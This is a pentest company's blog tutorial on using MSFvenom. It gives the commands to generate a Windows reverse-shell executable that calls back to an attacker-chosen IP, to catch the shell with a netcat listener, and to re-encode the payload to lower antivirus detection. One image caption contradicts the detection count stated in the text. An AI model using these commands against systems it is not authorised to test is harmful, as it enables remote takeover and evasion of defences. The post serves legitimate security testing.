Cool Tools Series: MSFvenom

In this post in the Cool Tools series, I’m going to share some tips on getting started with MSFvenom and how it can help you obtain a reverse shell on your penetration tests. If you missed Andrew Trexler’s recent Nuclei blog, be sure to check that out when you finish here!

MSFvenom is a great tool for generating shellcode quickly, with both encryption and/or encoding options available to help prevent AV detection.

The Basics

MSFvenom is part of the Metasploit framework and comes installed with Kali Linux but can also be installed using the following command:

sudo apt install Metasploit-framework

Payloads

The tool has a variety of payloads for different purposes, for specific Operating Systems (including Windows and Linux), and for a large list of web application architectures. A list of all payloads can be obtained from the tool with this command:

msfvenom -l payloads

A full list of options can be obtained from the tool using:

msfvenom –help

Running a Payload

For this example, we will assume that we are running our payload on a computer on a shared internal network. To gain a reverse shell on a target system, we will first need to discover our internal IP address and setup a listener port.

First we will generate a reverse shell payload for a Windows machine as an .exe file, without any additional options:

msfvenom -p windows/shell/reverse_tcp LHOST=<Your IP Address> LPORT=<Your listening port> -f exe > rev-shell.exe
Generating a reverse shell payload with MSFvenom

Next we place the reverse shell file, now called rev-shell.exe, on the host we are attacking.

After that, we open up a listener port using Netcat with the following command:

nc -lp 9897
Netcat

We see that netcat is actively listening on TCP/9897.

If we execute the payload on the attacking host, we should get a shell on Netcat:

Executing the payload and getting a shell

Bypassing Antivirus

This version of the payload generated by MSFvenom  will quickly be picked up by most AV solutions. When running the generated payload through VirusTotal we see 64/75 detection engines pick up the reverse shell payload as a virus:

VirusTotal results are 64

Let’s regenerate the payload with encoding applied in 10 iterations, using the following command:

msfvenom -p windows/x64/custom/reverse_tcp --encoder x64/xor -i 10 LHOST=<your IP Address> LPORT=<preferred port number> -f exe > rev-shell_encoded.exe
MSFvenom with encoding

Sending that file through VirusTotal, we see that 57/75 detection engines pick the payload up at a threat:

VirusTotal results are 64

There are many features within MSFvenom to help obfuscate the payload from antivirus software and to help bypass AV detection while in transit.

In Conclusion

You can explore more information regarding MSFvenom and the entire Metasploit-framework here: https://www.offsec.com/metasploit-unleashed/msfvenom

I hope you’ve enjoyed this look at MSFvenom. We hope you’ll take a look at the next post in the Cool Tools series as well.

Raxis X logo as document separator
Cool Tools Series: MSFvenom
PenTest As a SErvice

Penetration Testing as a Service doesn’t have to be a dressed up vulnerability scan. Raxis PTaaS delivers a solid pentest done right and when you need it.

Blog CAtegories